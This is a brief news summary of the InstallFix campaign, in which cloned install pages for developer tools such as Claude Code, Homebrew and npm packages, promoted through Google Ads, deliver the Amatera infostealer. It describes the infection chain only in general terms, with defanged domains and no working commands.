SECURITYWEEK reports that cloned webpages impersonating popular development tools are being used in the InstallFix campaign to deliver information-stealing malware. According to Push Security, threat actors replace legitimate install commands on cloned pages and rely on malvertising, with one variant targeting Anthropic’s Claude Code CLI and served exclusively through Google Ads to boost visibility.
The cloned pages are near pixel-perfect replicas, but the install one-liner you click on ultimately points to an attacker‑controlled server that downloads an infostealer instead of the legitimate installer. When the payload runs, cmd[.]exe spawns mshta[.]exe to fetch code from a remote server, triggering an Amatera Stealer infection.
Push Security notes that the actors are hosting malicious content on legitimate-looking domains such as Cloudflare Pages, Squarespace and Tencent EdgeOne to blend with normal traffic, and have been observed distributing malware via clones of claude[.]ai, Homebrew, GitHub repositories and NPM packages that mimic Claude Code. This is described as part of a broad malvertising and impersonation campaign, with different sites shown to execute identical binaries.